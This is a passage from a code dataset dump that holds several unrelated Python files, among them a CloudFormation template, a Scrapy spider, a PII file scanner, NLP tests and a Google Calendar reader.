\"S3Bucket\",\n BucketName=bucket_name,\n LifecycleConfiguration=LifecycleConfiguration(\n 
Rules=[s3_lifecycle_rule]\n ),\n Tags=Tags(\n Duration=date,\n Owner=owner_email,\n Name=Join(\"_\", [\"Training\", owner, \"RawStorageBucket\"]),\n )\n))\n\n###############################################################################\n\nlambda_iam_policy = PolicyProperty(\n PolicyName=\"lambda-execution-policy\",\n PolicyDocument=Policy(\n Statement=[\n Statement(\n Effect=\"Allow\",\n Action=[\n Action(\"s3\", \"ListBucket\")\n ],\n Resource=[\"arn:aws:s3:::{0}\".format(bucket_name)]\n ),\n Statement(\n Effect=\"Allow\",\n Action=[\n Action(\"s3\", \"PutObject\")\n ],\n Resource=[\"arn:aws:s3:::{0}/*\".format(bucket_name)]\n ),\n Statement(\n Effect=\"Allow\",\n Action=[\n Action(\"kinesis\", \"Describe*\"),\n Action(\"kinesis\", \"List*\"),\n Action(\"kinesis\", \"Get*\")\n ],\n Resource=[Join(\n \"\",\n [\n \"arn:aws:kinesis:{0}:{1}:stream/\".format(\n region, account_id\n ),\n Ref(kinesis_stream)\n ]\n )]\n )\n ]\n )\n)\n\nlambda_iam_role = t.add_resource(Role(\n \"LambdaIAMRole\",\n AssumeRolePolicyDocument=Policy(\n Statement=[Statement(\n Effect=\"Allow\",\n Principal=Principal(\n \"Service\", [\"lambda.amazonaws.com\"]\n ),\n Action=[Action(\"sts\", \"AssumeRole\")]\n )]\n ),\n Path=\"/\",\n Policies=[lambda_iam_policy]\n))\n\nlambda_function = t.add_resource(Function(\n \"MoveToS3\",\n Code=Code(\n S3Bucket=Ref(lambda_repository_bucket_name),\n S3Key=Ref(lambda_repository_bucket_key),\n S3ObjectVersion=Ref(lambda_repository_bucket_version)\n ),\n Handler=\"{0}.handler\".format(lambda_function_name),\n Role=GetAtt(lambda_iam_role, \"Arn\"),\n Runtime=\"nodejs\",\n Timeout=\"6\"\n))\n\n###############################################################################\n\nredshift_security_group = t.add_resource(ClusterSecurityGroup(\n \"RedshiftSecurityGroup\",\n Description=\"SG to restrict inbound internet access\"\n))\n\nredshift_security_group_ingress = t.add_resource(ClusterSecurityGroupIngress(\n \"RedshiftSecurityGroupIngress\",\n ClusterSecurityGroupName=Ref(redshift_security_group),\n CIDRIP=Ref(connect_from_ip)\n))\n\nredshiftcluster = t.add_resource(Cluster(\n \"RedshiftCluster\",\n ClusterType=\"single-node\",\n ClusterSecurityGroups=[Ref(redshift_security_group)],\n NodeType=\"dc1.large\",\n DBName=\"bigdatatest\",\n MasterUsername=\"admin\",\n MasterUserPassword=Ref(master_password),\n PubliclyAccessible=True\n))\n\n###############################################################################\n\nprint(t.to_json())\n","sub_path":"cloudformation/src/big-data-pipeline.py","file_name":"big-data-pipeline.py","file_ext":"py","file_size_in_byte":5590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"316429109","text":"def main():\n from sys import stdin\n input = stdin.readline\n n = int(input())\n S = [input() for _ in [0]*n]\n s2 = []\n s3 = []\n for s in S:\n temp = [0, 0]\n m = 0\n now = 0\n for i in s.strip('\\n'):\n if i == \"(\":\n now += 1\n else:\n now -= 1\n m = min(m, now)\n temp = [-m, (s.count(\"(\")-s.count(\")\"))-m]\n if temp[0] < temp[1]:\n s2.append(temp)\n else:\n s3.append(temp)\n s2.sort(key=lambda x: (x[0]))\n s3.sort(key=lambda x: (-x[1]))\n cnt = 0\n for i, j in s2:\n cnt -= i\n if cnt < 0:\n print(\"No\")\n return\n cnt += j\n for i, j in s3:\n cnt -= i\n if cnt < 0:\n print(\"No\")\n return\n cnt += j\n if cnt != 0:\n print(\"No\")\n return\n 
print(\"Yes\")\n\n\nmain()\n","sub_path":"Python_codes/p02686/s392310458.py","file_name":"s392310458.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"433787122","text":"# -*- coding: utf-8 -*-\nimport os\nimport scrapy\nimport pandas as pd \n\ndir_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n\ndf = pd.read_csv(filepath_or_buffer=dir_path+'/tripadvisor_all_location.csv')\n\n# alter index to get other location\nidentify_link = list(df.identify_link)[23]\nlink = list(df.link)[23]\n\n\nclass TripadvisorHotelSpider(scrapy.Spider):\n name = 'tripadvisor_hotel'\n allowed_domains = ['tripadvisor.com.vn']\n start_urls = [link]\n\n custom_settings={ 'FEED_URI': f\"tripadvisor_{identify_link}.csv\",\n 'FEED_FORMAT': 'csv'}\n\n\n def parse(self, response):\n\n print(\"procesing:\"+response.url)\n \n hotel_class=response.css(\".listing_title > a\")\n name_hotel=hotel_class.css(\"a::text\").extract()\n url_hotel=hotel_class.css(\"a::attr(href)\").extract()\n\n row_data=zip(name_hotel, url_hotel)\n\n for item in row_data:\n scraped_info = {\n 'name_hotel':item[0],\n 'url' : response.urljoin(item[1])\n }\n\n yield scraped_info\n\n\n NEXT_PAGE_SELECTOR = \".ui_pagination > a.next::attr(href)\"\n next_page = response.css(NEXT_PAGE_SELECTOR).extract_first()\n if next_page:\n yield scrapy.Request(\n response.urljoin(next_page),\n callback=self.parse)\n","sub_path":"scrapy/Assigment_AIS/tripadvisor_pages/tripadvisor_pages/spiders/tripadvisor_hotel.py","file_name":"tripadvisor_hotel.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384904413","text":"import matplotlib.pyplot as plt\nfrom scipy import linalg\nimport numpy as np\n\nR_range = np.linspace(0, 10, 100, endpoint=True)\nb = np.array([0, 120, 120])\nI2_list = []\n\n\nfor R_x in R_range:\n a = np.array([[1, -1, -1],\n [3.5, R_x, 0],\n [3.5, 0, 6.6]])\n\n x = linalg.solve(a, b)\n I2_list.append(x[1])\n\n\nPower_list = [I2_list[i]**2 * R_range[i] for i in range(len(I2_list))]\nP_max_idx = Power_list.index(max(Power_list))\nprint(f\"Maksymalna moc wydzialana na oporniku: {round(Power_list[P_max_idx], 2)} W\")\nprint(f\"Wartosc oporu R_x, przy ktorej moc wydzielana jest najwieksza: {round(R_range[P_max_idx], 2)} Ω\")\n\n\nfor i in Power_list:\n print(i)\n\n\"\"\"\"\nplt.plot(R_range, Power_list, 'ro-', label=r\"P($R_x$)\")\nplt.scatter(R_range[P_max_idx], Power_list[P_max_idx], label=r'$P_{max}$', linewidths=7)\nplt.grid()\nplt.xlabel(\"R [Ω]\", fontsize=20)\nplt.ylabel(\"P [W]\", fontsize=20)\nplt.title(r'Wykres mocy wydzielanej przez opornik $R_x$ w zaleznosci od wartosci rezystancji opornika $R_x$', fontsize = 30)\nplt.legend(fontsize=40)\n\nmng = plt.get_current_fig_manager()\nmng.full_screen_toggle()\nplt.show()\n\"\"\"","sub_path":"raport/raport2.py","file_name":"raport2.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"219180974","text":"import tableprint\nimport json\nimport logging\nimport os\nimport magic\nimport csv\n\nfrom piicatcher.tokenizer import Tokenizer\nfrom piicatcher.explorer.metadata import NamedObject\nfrom piicatcher.piitypes import PiiTypes, PiiTypeEncoder\nfrom piicatcher.scanner import NERScanner, RegexScanner\n\n\ndef dispatch(ns):\n logging.debug(\"File Dispatch entered\")\n explorer = 
FileExplorer(ns.path)\n explorer.scan()\n with open(\"output.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(explorer.data_db)\n if ns.output_format == \"ascii_table\":\n headers = [\"Path\", \"Mime/Type\", \"pii\"]\n tableprint.table(explorer.get_tabular(), headers)\n elif ns.output_format == \"json\":\n print(json.dumps(explorer.get_dict(), sort_keys=True, indent=2, cls=PiiTypeEncoder))\n\n\ndef parser(sub_parsers):\n sub_parser = sub_parsers.add_parser(\"files\")\n\n sub_parser.add_argument(\"--path\",\n help=\"Path to file or directory\")\n\n sub_parser.add_argument(\"--output\", default=None,\n help=\"File path for report. If not specified, \"\n \"then report is printed to sys.stdout\")\n sub_parser.add_argument(\"--output-format\", choices=[\"ascii_table\", \"json\", \"orm\"],\n default=\"ascii_table\",\n help=\"Choose output format type\")\n sub_parser.set_defaults(func=dispatch)\n\n\nclass File(NamedObject):\n\n def __init__(self, name, mime_type):\n super(File, self).__init__(name)\n self._mime_type = mime_type\n\n def get_mime_type(self):\n return self._mime_type\n\n def scan(self, context, data_db, ref):\n tokenizer = context['tokenizer']\n regex = context['regex']\n ner = context['ner']\n\n if not self._mime_type.startswith('text/'):\n self._pii.add(PiiTypes.UNSUPPORTED)\n else:\n with open(self.get_name(), 'r') as f:\n data = f.read()\n [self._pii.add(pii) for pii in ner.scan(data, data_db, ref=os.path.basename(self.get_name()))]\n print(self.get_name())\n tokens = tokenizer.tokenize(data)\n for t in tokens:\n if not t.is_stop:\n [self._pii.add(pii) for pii in regex.scan(t.text, data_db,\n ref=os.path.basename(self.get_name()))]\n\n\nclass FileExplorer:\n def __init__(self, path):\n self._path = path\n self._files = []\n self.data_db = []\n\n def scan(self):\n logging.debug(\"Scanning %s\" % self._path)\n if os.path.isfile(self._path):\n mime_type = magic.from_file(self._path, mime=True)\n self._files.append(File(self._path, mime_type))\n logging.debug('\\t- full path: %s, mime_type: %s' % (os.path.abspath(self._path), mime_type))\n else:\n for root, subdirs, files in os.walk(self._path):\n for filename in files:\n file_path = os.path.join(root, filename)\n mime_type = magic.from_file(file_path, mime=True)\n\n # print('\\t- full path: %s, mime_type: %s' % (file_path, mime_type))\n self._files.append(File(file_path, mime_type))\n\n context = {'tokenizer': Tokenizer(), 'regex': RegexScanner(), 'ner': NERScanner()}\n for f in self._files:\n root_filename = os.path.basename(f._name)\n f.scan(context, self.data_db, ref=root_filename)\n\n def get_tabular(self):\n tabular = []\n for f in self._files:\n tabular.append([f.get_name(), f.get_mime_type(), json.dumps(list(f.get_pii_types()),\n cls=PiiTypeEncoder)])\n return tabular\n\n def get_dict(self):\n result = []\n for f in self._files:\n result.append({\n 'path': f.get_name(),\n 'Mime/Type': f.get_mime_type(),\n 'pii': list(f.get_pii_types())\n })\n\n return {'files': result}\n","sub_path":"piicatcher/explorer/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"99408997","text":"\"\"\"Test cltk.stop.\"\"\"\n\n__license__ = 'MIT License. 
See LICENSE.'\n\nfrom cltk.corpus.utils.importer import CorpusImporter\nfrom cltk.stop.greek.stops import STOPS_LIST as GREEK_STOPS\nfrom cltk.stop.latin.stops import STOPS_LIST as LATIN_STOPS\nfrom cltk.stop.french.stops import STOPS_LIST as FRENCH_STOPS\nfrom cltk.stop.arabic.stopword_filter import stopwords_filter as arabic_stop_filter\nfrom nltk.tokenize.punkt import PunktLanguageVars\nimport os\nimport unittest\n\n\nclass TestSequenceFunctions(unittest.TestCase):\n \"\"\"Class for unittest\"\"\"\n\n def setUp(self):\n \"\"\"Clone Greek models in order to test pull function and other model\n tests later.\n \"\"\"\n corpus_importer = CorpusImporter('greek')\n corpus_importer.import_corpus('greek_models_cltk')\n file_rel = os.path.join('~/cltk_data/greek/model/greek_models_cltk/README.md')\n file = os.path.expanduser(file_rel)\n file_exists = os.path.isfile(file)\n self.assertTrue(file_exists)\n\n corpus_importer = CorpusImporter('latin')\n corpus_importer.import_corpus('latin_models_cltk')\n file_rel = os.path.join('~/cltk_data/latin/model/latin_models_cltk/README.md')\n file = os.path.expanduser(file_rel)\n file_exists = os.path.isfile(file)\n self.assertTrue(file_exists)\n\n def test_greek_stopwords(self):\n \"\"\"Test filtering Greek stopwords.\"\"\"\n sentence = 'Ἅρπαγος δὲ καταστρεψάμενος Ἰωνίην ἐποιέετο στρατηίην \\\n ἐπὶ Κᾶρας καὶ Καυνίους καὶ Λυκίους, ἅμα ἀγόμενος καὶ Ἴωνας καὶ \\\n Αἰολέας.'\n lowered = sentence.lower()\n punkt = PunktLanguageVars()\n tokens = punkt.word_tokenize(lowered)\n no_stops = [w for w in tokens if w not in GREEK_STOPS]\n target_list = ['ἅρπαγος', 'καταστρεψάμενος', 'ἰωνίην', 'ἐποιέετο',\n 'στρατηίην', 'κᾶρας', 'καυνίους', 'λυκίους', ',',\n 'ἅμα', 'ἀγόμενος', 'ἴωνας', 'αἰολέας.']\n self.assertEqual(no_stops, target_list)\n\n def test_latin_stopwords(self):\n \"\"\"Test filtering Latin stopwords.\"\"\"\n sentence = 'Quo usque tandem abutere, Catilina, patientia nostra?'\n lowered = sentence.lower()\n punkt = PunktLanguageVars()\n tokens = punkt.word_tokenize(lowered)\n no_stops = [w for w in tokens if w not in LATIN_STOPS]\n target_list = ['usque', 'tandem', 'abutere', ',', 'catilina', ',',\n 'patientia', 'nostra', '?']\n self.assertEqual(no_stops, target_list)\n def test_arabic_stopwords(self):\n \"\"\"Test filtering arabic stopwords.\"\"\"\n sentence = 'سُئِل بعض الكُتَّاب عن الخَط، متى يَسْتحِقُ أن يُوصَف بِالجَودةِ؟'\n no_stops = arabic_stop_filter(sentence)\n target_list = ['سئل', 'الكتاب', 'الخط', '،', 'يستحق', 'يوصف', 'بالجودة', '؟']\n self.assertEqual(no_stops, target_list)\n\n def test_french_stopwords(self):\n ##test filtering French stopwords\n sentence = \"En pensé ai e en talant que d ’ Yonec vus die avant dunt il fu nez, e de sun pere cum il vint primes a sa mere .\"\n lowered = sentence.lower()\n punkt = PunktLanguageVars()\n tokens = punkt.word_tokenize(lowered)\n no_stops = [w for w in tokens if w not in FRENCH_STOPS]\n target_list = ['pensé', 'talant', 'd', '’', 'yonec', 'die', 'avant', 'dunt', 'nez', ',', 'pere', 'cum', 'primes',\n 'mere','.']\n self.assertEqual(no_stops, target_list)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cltk/tests/test_stop.py","file_name":"test_stop.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"234565503","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\ntry:\n from 
django.apps import AppConfig\nexcept ImportError:\n class AppConfig(object):\n pass\n\n\nclass BlogAppConfig(AppConfig):\n name = 'djangocms_blog'\n verbose_name = _('django CMS Blog')\n\n @staticmethod\n def setup():\n from cms.api import create_page, create_title\n from cms.exceptions import NoHomeFound\n from cms.models import Page\n from cms.utils import get_language_list\n from cms.utils.conf import get_templates\n from django.utils.translation import override\n\n from .cms_appconfig import BlogConfig\n from .settings import get_setting\n\n if get_setting('AUTO_SETUP'):\n configs = BlogConfig.objects.all()\n if not configs.exists():\n config = BlogConfig.objects.create(namespace='Blog')\n langs = get_language_list()\n blog = None\n for lang in langs:\n with override(lang):\n config.set_current_language(lang)\n config.app_title = get_setting('AUTO_APP_TITLE')\n config.save()\n default_template = get_templates()[0][0]\n try:\n home = Page.objects.get_home()\n except NoHomeFound:\n home = None\n if not home:\n home = create_page(\n get_setting('AUTO_HOME_TITLE'), language=lang,\n template=default_template, in_navigation=True, published=True\n )\n elif lang not in home.get_languages():\n create_title(\n language=lang, title=get_setting('AUTO_HOME_TITLE'), page=home\n )\n home.publish(lang)\n if not blog:\n blog = create_page(\n get_setting('AUTO_BLOG_TITLE'), language=lang, apphook='BlogApp',\n apphook_namespace=config.namespace, parent=home,\n template=default_template, in_navigation=True, published=True\n )\n else:\n create_title(\n language=lang, title=get_setting('AUTO_BLOG_TITLE'), page=blog\n )\n blog.publish(lang)\n","sub_path":"djangocms_blog/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"512495205","text":"from bs4 import BeautifulSoup\nimport numpy as np\nimport re\nimport pandas as pd\nfrom sklearn import svm\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport codecs\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ntrain = pd.read_csv(\"data/LabeledTrainData.csv\", header=0, delimiter=\",\",encoding = 'utf-8')\ntest = pd.read_csv(\"data/TestData.tsv\", header=0, delimiter=\"\\t\",encoding = 'utf-8',quoting = 3)\nfile_name = 'data/StopWords.txt'\nwith codecs.open(file_name,'r','utf-8') as inp:\n stop_words = [x[:-1] for x in inp.readlines()]\n\ndef tokenize(text):\n REGEX = re.compile(\" \")\n sentence = text\n words = (REGEX.split(sentence))\n return words\n\ndef news_to_words(raw_news):\n example1 = BeautifulSoup(raw_news,'html.parser')\n letters_only = re.sub(\"[^\\u0980-\\u09FF]\",\" \",example1.get_text())\n letters_only = re.sub(\"[\\u09E6-\\u09EF]+| ৷\",\" \",letters_only)\n words = letters_only.split()\n meaningful_words = [w for w in words if not w in stop_words]\n return (\" \".join(meaningful_words))\n\n\n\ndef clean_train_data():\n num_news = len(train[\"news\"])\n st = ''\n for i in range(0,num_news):\n if ((i + 1) % 3 == 0):\n #print(\"news %d of %d\\n\" % (i + 1, num_news))\n st = news_to_words(train[\"news\"][i])\n clean_train_news.append(news_to_words(train[\"news\"][i]))\n\n\n\ndef clean_test_data():\n num_news = len(test[\"news\"])\n print(\"len of test news is \",num_news)\n st = ''\n for i in range(0, num_news):\n if ((i + 1) % 2 == 0):\n # print(\"news %d of %d\\n\" % (i + 1, num_news))\n st = news_to_words(test[\"news\"][i])\n clean_test_news.append(news_to_words(test[\"news\"][i]))\n\nclean_train_news 
= []\nclean_test_news = []\n\nclean_train_data()\nvectorizer = CountVectorizer( analyzer='word', tokenizer = lambda x : tokenize(x), lowercase=False, ngram_range=(1,1) )\nprint(vectorizer)\nfeature_train_array = vectorizer.fit_transform(clean_train_news)\nfeature_train_array = feature_train_array.toarray()\nfeature_names = vectorizer.get_feature_names()\n\n#print(test[\"news\"])\nclean_test_data()\nfeature_test_array = vectorizer.transform(clean_test_news)\nfeature_test_array = feature_test_array.toarray()\nprint(feature_test_array)\n\n\n\n\"\"\"\"\ndist = np.sum(train_data_features,axis = 0)\nfor tag,count in zip(vocab,dist):\n print(tag,count)\nforest = RandomForestClassifier(n_estimators=100)\nforest = forest.fit(train_data_features,train[\"sentiment\"])\nprint(len(train[\"sentiment\"]))\ntest = pd.read_csv(\"data/TestData.tsv\",header=0,delimiter=\"\\t\",quoting=3)\nprint(test.shape)\nnum_reviews = len(test[\"news\"])\nclean_test_reviews = []\n\nfor i in range(0,num_reviews):\n if((i+1) % 1000 == 0):\n print(\"Review %d of %d\\n\" % (i + 1, num_reviews))\n clean_review = news_to_words(test[\"news\"][i])\n clean_test_reviews.append(clean_review)\ntest_data_features = vectorizer.transform(clean_test_reviews)\ntest_data_features = test_data_features.toarray()\nresult = forest.predict(test_data_features)\noutput = pd.DataFrame(data = {\"id\":test[\"\"],\"sentiment\":result})\noutput.to_csv(\"Bag_of_Words_model.csv\",index = False,quoting=3)\n\"\"\"\n\nvocab = vectorizer.get_feature_names()\ndist = np.sum(feature_test_array,axis = 0)\n#for tag,count in zip(vocab,dist):\n# print(tag,count)\nforest = RandomForestClassifier(n_estimators=100)\nforest = forest.fit(feature_train_array,train[\"sentiment\"])\nresult = forest.predict(feature_test_array)\nids = []\nfor i in range(0,len(test[\"news\"])):\n ids.append(i)\ntest_id = pd.DataFrame()\ntest_id[\"id\"] = ids\n#for i in range(0,len(ids)):\n# print(ids[i])\noutput = pd.DataFrame(data = {\"id\":test_id[\"id\"],\"sentiment\":result})\noutput.to_csv(\"result/Bag_of_Words_model.csv\",index = False,quoting=3)\n\n\n\n\n","sub_path":"SVM check/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"22980748","text":"'''\nWrite a program that has a notas() function that can receive several student grades and returns a dictionary\nwith the following information:\n - Number of grades\n - The highest grade\n - The lowest grade\n - The class average\n - The status (optional)\nAlso add the function's docstrings.\n'''\n\n\ndef notas(*nts, mostrasitu=False):\n \"\"\"\n => Function to analyze the grades and status of a class with several students.\n :param nts: one or more student grades\n :param mostrasitu: optional parameter, indicating whether or not the status should be added to the output\n :return: dictionary with information about the class (number of grades, highest grade, lowest grade, class average and\n status (optional))\n \"\"\"\n\n\n dici = {}\n dici['qtd'] = len(nts)\n dici['maior'] = max(nts)\n dici['menor'] = min(nts)\n dici['media'] = sum(nts) / len(nts)\n\n if mostrasitu:\n if dici['media'] >= 7:\n dici['situ'] = 'BOA'\n elif dici['media'] >= 5:\n dici['situ'] = 'RAZOÁVEL'\n else:\n dici['situ'] = 'RUIM'\n\n return dici\n\n\ndicionario = notas(9, 10, 5.5, 2.5, 8.5, mostrasitu=True)\nprint(dicionario)\n","sub_path":"Prontos e 
Corrigidos/ex105.py","file_name":"ex105.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265250091","text":"import gspread\nimport json\n\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nscope = ['https://spreadsheets.google.com/feeds']\njson_key = json.load(open('client_secret_1033617619515-93p0cc389fnvtn67peioa22r8gq9d5vb.apps.googleusercontent.com.json'))\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('client_id.json', scope)\n\n\ngc = gspread.authorize(credentials)\n\n# Open a worksheet from spreadsheet with one shot\nwks = gc.open(\"Where is the money Lebowski?\").sheet1\n\nwks.update_acell('B2', \"it's down there somewhere, let me take another look.\")\n\n# Fetch a cell range\ncell_list = wks.range('A1:B7')\n","sub_path":"old/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644279763","text":"# ecoding=utf-8\r\n__author__ = \"liyinlong\"\r\n\r\n\"\"\"\r\n公共信息\r\n\"\"\"\r\n\r\nfrom appium import webdriver\r\nimport logging\r\nimport os\r\n\r\n\r\n\r\nclass AppiumTest():\r\n def __init__(self):\r\n \r\n desired_caps = {'platformName': 'Android',\r\n 'platformVersion': '6.0.1',\r\n 'deviceName': 'a155b926',\r\n 'appPackage': 'com.wuba.moneybox',\r\n 'appActivity': 'com.wuba.moneybox.ui.SplashActivity'}\r\n self.driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)\r\n self.driver.implicitly_wait(30)\r\n\r\n def get_driver(self):\r\n return self.driver\r\n \r\nclass log():\r\n def log(self,text): \r\n FILE = os.getcwd() \r\n logging.basicConfig(level=logging.INFO, \r\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', \r\n datefmt='%a, %d %b %Y %H:%M:%S', \r\n filename=os.path.join(FILE,'log.txt'), \r\n filemode='w') \r\n \r\n return logging.info(text)\r\n \r\n\r\n \r\n ","sub_path":"app_test/Base_driver.py","file_name":"Base_driver.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"27531746","text":"import pandas as pd\n\nyears = [2016, 2017, 2018, 2019, 2020]\ndfs = []\n\ndef dfYear(start_df, year):\n col = f'happiness_score_{year}'\n df = happy_df[['country', col]]\n df = df.rename(columns={col: \"happy\"})\n df['year'] = year\n print(df.head())\n\n return df\n\n\n# Read data\nhappy_df = pd.read_csv('data/final/happy_gov_continent.csv', delimiter=',')\n\nfor i in range(0,len(years)):\n dfs.append(dfYear(happy_df, years[i]))\n\noutput = pd.concat(dfs)\n\n\noutput.to_csv('data/final/lineData.csv', index=False, header=True)\n\n# happy2016 = dfYear(happy_df, 2016)\n# happy2017 = dfYear(happy_df, 2017)\n# happy2018 = dfYear(happy_df, 2018)\n# happy2019 = dfYear(happy_df, 2019)\n# happy2020 = dfYear(happy_df, 2020)\n\n\n\n\n# out_df.to_csv('data/final/happy_gov_continent.csv', index=False, header=True)","sub_path":"scripts/lineData.py","file_name":"lineData.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"574777304","text":"import socket\nfrom datetime import datetime\nsock = socket.socket()\nsock.bind(('', 1111))\nsock.listen(1) #maybe more\nwhile True:\n conn, adr = sock.accept()\n data = conn.recv(1024)\n msg = data.decode('utf8')\n print(msg, 
adr)\nconn.close()\n","sub_path":"a_server.py","file_name":"a_server.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"328192924","text":"from typing import Any\nfrom lib import *\n\n# 2028 Too high\n\ndata = fileIntoArray(\"data8.txt\")[0]\n\nWIDTH = 25\nHEIGHT = 6\n\nBLACK = 0\nWHITE = 1\nTRANSPARENT = 2\n\nBLOCKS = ['\\u2591', '\\u2588']\n\n\ndef chunk(l: [Any], n: int) -> [[Any]]:\n return [l[i:i + n] for i in range(0, len(l), n)]\n\n\nlayers: [[int]] = chunk(mapList(toInt, data), WIDTH*HEIGHT)\n\n# layers.sort(key=lambda l: l.count(0))\n\n# print(layers[0].count(1) * layers[0].count(2))\n\noutput = []\n\nfor h in range(HEIGHT):\n output.append([])\n for w in range(WIDTH):\n i = h * WIDTH + w\n for layer in layers:\n if layer[i] != TRANSPARENT:\n output[h].append(BLOCKS[layer[i]])\n print(BLOCKS[layer[i]], end=\"\")\n break\n print(\"\")\n","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"8663052","text":"import numpy as np\nimport generator \nimport pickle\nfrom sklearn.linear_model import Ridge\n\ndef seq_to_feat(x):\n return np.hstack([x.mean(0), x.std(0)])\n\nX_tr, X_te, Y_tr, Y_te = generator.human.honest()\n\nX_tr = np.float32(np.vstack( [seq_to_feat(i) for i in X_tr] ))\nX_te = np.float32(np.vstack( [seq_to_feat(i) for i in X_te] ))\n\nY_te = np.float32(Y_te)\nY_tr = np.float32(Y_tr)\n\nscores = []\nc_list = list(range(-7,7))\nfor i in c_list:\n clf = Ridge(alpha=10.**i)\n clf.fit(X_tr, Y_tr)\n Y_hat = clf.predict(X_te)\n score = np.mean(np.array(Y_hat<0.5)==np.array(Y_te<0.5))\n print(score)\n scores.append(score)\nbest_c = c_list[np.argmax(scores)]\nprint(best_c)\n\nclf = Ridge(alpha=10.**best_c)\nY_hat = clf.fit(X_tr,Y_tr).predict(X_te)\nscore = np.mean(np.array(Y_hat<0)==np.array(Y_te<0))\nprint(score)\n\nX = np.vstack([X_tr,X_te])\nY = np.hstack([Y_tr,Y_te])\nclf.fit(X,Y)\n\npickle.dump(clf,open('honest_sklearn_model.pkl','wb'))\n","sub_path":"src/emonet/train/train_hone.py","file_name":"train_hone.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"183992079","text":"matrix = [list(map(int, input().split())) for i in range(5)]\r\nlocation = None\r\n\r\nflag = True\r\ni = 0\r\n\r\nwhile i < len(matrix) and flag:\r\n j = 0\r\n while j < len(matrix[i]) and flag:\r\n if matrix[i][j] == 1:\r\n location = [i, j]\r\n flag = False\r\n j+=1\r\n i+=1\r\n\r\nres = abs(location[0] - 2) + abs(location[1] - 2)\r\nprint(res)","sub_path":"codeforces/beautiful_matrix.py","file_name":"beautiful_matrix.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315675986","text":"from collections import namedtuple\nimport datetime as dt\nimport pickle\nimport os\n\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom google.auth.exceptions import TransportError\nfrom httplib2 import ServerNotFoundError\n\nimport pandas as pd\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = [\"https://www.googleapis.com/auth/calendar.readonly\"]\n\n\ndef _get_google_calendar_creds():\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created 
automatically when the authorization flow completes for the first\n # time.\n creds = None\n if os.path.exists(\"token.pickle\"):\n with open(\"token.pickle\", \"rb\") as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n try:\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\"credentials.json\", SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(\"token.pickle\", \"wb\") as token:\n pickle.dump(creds, token)\n except TransportError as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print(\"Exiting. Can't complete task. Check the internet connection.\")\n exit()\n return creds\n\n\ndef _format_calendar_events(events):\n Record = namedtuple(\"Record\", [\"id\", \"start_utc\", \"end_utc\", \"updated_utc\", \"summary\", \"description\"])\n events_list = []\n for event in events:\n try:\n description = event[\"description\"]\n except KeyError:\n description = None\n try:\n startdatetime = event[\"start\"][\"dateTime\"]\n enddatetime = event[\"end\"][\"dateTime\"]\n updated_utc = event[\"updated\"]\n except KeyError:\n # if the event is \"all day\", it will be a date instead of dateTime. We ignore these events\n startdatetime = None\n enddatetime = None\n event_tuple = Record(event[\"id\"], startdatetime, enddatetime, updated_utc, event[\"summary\"], description)\n events_list.append(event_tuple)\n df = pd.DataFrame(events_list, columns=Record._fields)\n df = df.rename(columns={\"id\": \"event_id\"})\n 